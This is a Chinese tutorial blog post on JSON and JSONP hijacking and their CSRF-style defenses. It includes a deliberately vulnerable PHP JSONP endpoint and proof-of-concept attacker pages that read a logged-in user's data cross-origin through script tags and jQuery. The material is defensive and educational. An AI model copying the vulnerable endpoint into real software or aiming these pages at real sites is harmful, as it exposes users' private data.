首页
所有分类
TAGS
文字工具 EMOJI BIBLE
编程 Javascript

详解JSON和JSONP劫持以及解决方法

Posted in Javascript onMarch 08, 2019

json劫持

json劫持攻击又为”JSON Hijacking”,攻击过程有点类似于csrf,只不过csrf只管发送http请求,但是json-hijack的目的是获取敏感数据。

一些web应用会把一些敏感数据以json的形式返回到前端,如果仅仅通过cookie来判断请求是否合法,那么就可以利用类似csrf的手段,向目标服务器发送请求,以获得敏感数据。

比如下面的链接在已登录的情况下会返回json格式的用户信息:

http://www.test.com/userinfo

攻击者可以在自己的虚假页面中,加入如下标签:

<script src="http://www.test.com/userinfo"></script>

如果当前浏览器已经登录了www.test.com,并且cookie未过期,然后访问了攻击者的虚假页面,那么该页面就可以拿到json形式的用户敏感信息,因为script标签会自动解析json数据,生成对应的js对象。然后再通过

Object.prototype.__defineSetter__

这个函数来触发自己的恶意代码。

但是这个函数在当前的新版本chrome和firefox中都已经失效了。

jsonp劫持

jsonp是一个非官方的协议,利用script元素的开放策略,网页可以得到从其他来源动态产生的json数据,因此可以用来实现跨域。(关于JSONP可以参考我的博文:https://3water.com/article/31167.htm)

web程序如果通过这种方式跨域之后,攻击者完全可以在自己的虚假页面中发起恶意的jsonp请求,这就引来了安全问题。比如:

<script>
function useUserInfo(v){
  alert(v.username);
}
</script>
<script src="http://www.test.com/userinfo?callback=useUserInfo"></script>

如果服务器端的userinfo接口支持jsonp,那就会使虚假页面成功执行useUserInfo函数,从而导致安全问题。

解决方法

其实json劫持和jsonp劫持属于CSRF( Cross-site request forgery 跨站请求伪造)的攻击范畴,所以解决的方法和解决csrf的方法一样。

1、验证 HTTP Referer 头信息;
2、在请求中添加 csrfToken 并在后端进行验证;

关于CSRF攻击可以参考我的博文:https://3water.com/article/157550.htm 

PS:JSONP劫持漏洞实例

getUser.php

<?php
header('Content-type: application/json');
$jsoncallback = htmlspecialchars($_REQUEST ['jsoncallback']);//获取回调函数名
//json数据
//$json_data = '["id","user"]';
$json_data='({"id":"1","name":"Aaron"})';
echo $jsoncallback . "(" . $json_data . ")";//输出jsonp格式的数据
?>

Payload利用:

客户端实现 callbackFunction 函数

<!DOCTYPE html>
<html>
<head>
<meta charset="utf-8">
<title>JSONP劫持测试</title>
</head>
<body>
<script type="text/javascript">
function callbackFunction(result)
    {
      alert(result.name);
    }
</script>
<script type="text/javascript" src="http://127.0.0.1/test/getUser.php?jsoncallback=callbackFunction"></script>
</body>
</html>

jQuery 使用 JSONP

<!DOCTYPE html>
<html>
<head>
  <meta charset="utf-8">
  <title>JSONP劫持测试</title>
  <script src="http://cdn.static.runoob.com/libs/jquery/1.8.3/jquery.js"></script>  
</head>
<body>
<div id="divCustomers"></div>

<script type="text/javascript">  
  $.getJSON("http://127.0.0.1/test/getUser.php?jsoncallback=?", function(getUsers){
     alert(getUsers.name);
  });
</script>
</body>
</html>

以上就是本文的全部内容,希望对大家的学习有所帮助,也希望大家多多支持三水点靠木。权声明:本文为博主原创文章,转载请附上博文链接!

详解JSON和JSONP劫持以及解决方法

- Author -

yjclsx

声明:登载此文出于传递更多信息之目的,并不意味着赞同其观点或证实其描述。

Javascript 相关文章推荐
JS验证控制输入中英文字节长度(input、textarea等)具体实例
Jun 21 Javascript
jQuery实现向下滑出的平滑下拉菜单效果
Aug 21 Javascript
jquery实现经典的淡入淡出选项卡效果代码
Sep 22 Javascript
谈谈js中的prototype及prototype属性解释和常用方法
Nov 25 Javascript
jquery实现全选、反选、获得所有选中的checkbox
Sep 13 Javascript
JavaScript判断变量是否为数组的方法(Array)
Feb 24 Javascript
js判断请求的url是否可访问,支持跨域判断的实现方法
Sep 17 Javascript
Vue应用部署到服务器的正确方式
Jul 15 Javascript
VUE安装使用教程详解
Jun 03 Javascript
Vue.js递归组件实现组织架构树和选人功能案例分析
Jul 03 Javascript
JS一次前端面试经历记录
Mar 19 Javascript
原型和原型链 prototype和proto的区别详情
Nov 02 Javascript
Node.js Event Loop各阶段讲解
Mar 08 #Javascript
vue基础之data存储数据及v-for循环用法示例
Mar 08 #Javascript
vue.js使用v-model实现表单元素(input) 双向数据绑定功能示例
Mar 08 #Javascript
JavaScript解析机制与闭包原理实例详解
Mar 08 #Javascript
零基础之Node.js搭建API服务器的详解
Mar 08 #Javascript
详解vue项目中使用token的身份验证的简单实践
Mar 08 #Javascript
Javascript之高级数组API的使用实例
Mar 08 #Javascript
短信验证码(1) harbor(1) 分布式锁(3) GoFrame(3) Tablespace(1) commit(1) procedure(1) SQLite3(1) 内置函数(1) pytz(1)
You might like
PHP CURL CURLOPT参数说明(curl_setopt)
2013/09/30 PHP
PHP实现C#山寨ArrayList的方法
2015/07/16 PHP
header与缓冲区之间的深层次分析
2016/07/30 PHP
php+jQuery+Ajax简单实现页面异步刷新
2016/08/08 PHP
php读取出一个文件夹及其子文件夹下所有文件的方法示例
2017/06/15 PHP
php 读取文件夹下所有图片、文件的实例
2018/10/17 PHP
laravel-admin解决表单select联动时,编辑默认没选上的问题
2019/09/30 PHP
Laravel 对某一列进行筛选然后求和sum()的例子
2019/10/10 PHP
jquery attr 设定src中含有&amp;(宏)符号问题的解决方法
2011/07/26 Javascript
JS删除数组元素的函数介绍
2013/03/27 Javascript
jquery插件jTimer(jquery定时器)使用方法
2013/12/23 Javascript
jQuery选择id属性带有点符号元素的方法
2015/03/17 Javascript
jQuery模仿京东/天猫商品左侧分类导航菜单效果
2016/06/29 Javascript
BootStrap便签页的简单应用
2017/01/06 Javascript
JavaScript创建对象的常用方式总结
2018/08/10 Javascript
详解如何模拟实现node中的Events模块(通俗易懂版)
2019/04/15 Javascript
微信小程序中的video视频实现 自定义播放按钮、封面图、视频封面上文案
2020/01/02 Javascript
React中获取数据的3种方法及优缺点
2020/02/18 Javascript
js+audio实现音乐播放器
2020/09/13 Javascript
[46:47]2014 DOTA2国际邀请赛中国区预选赛 DT VS HGT
2014/05/22 DOTA
[01:38]完美世界DOTA2联赛PWL S3 集锦第四期
2020/12/21 DOTA
Python在Console下显示文本进度条的方法
2016/02/14 Python
python相似模块用例
2016/03/04 Python
python正则表达式匹配IP代码实例
2019/12/28 Python
利用Python发送邮件或发带附件的邮件
2020/11/12 Python
外包公司软件测试工程师
2014/11/01 面试题
列车长先进事迹材料
2014/01/25 职场文书
知识竞赛主持词
2014/03/26 职场文书
中层干部竞聘演讲稿
2014/05/15 职场文书
2014最新离职证明范本
2014/09/12 职场文书
小学班主任教育随笔
2015/08/15 职场文书
Navicat for MySQL的使用教程详解
2021/05/27 MySQL
MySQL的全局锁和表级锁的具体使用
2021/08/23 MySQL
Mysql中有关Datetime和Timestamp的使用总结
2021/12/06 MySQL
springboot 全局异常处理和统一响应对象的处理方式
2022/06/28 Java/Android
JS实现简单九宫格抽奖
2022/06/28 Javascript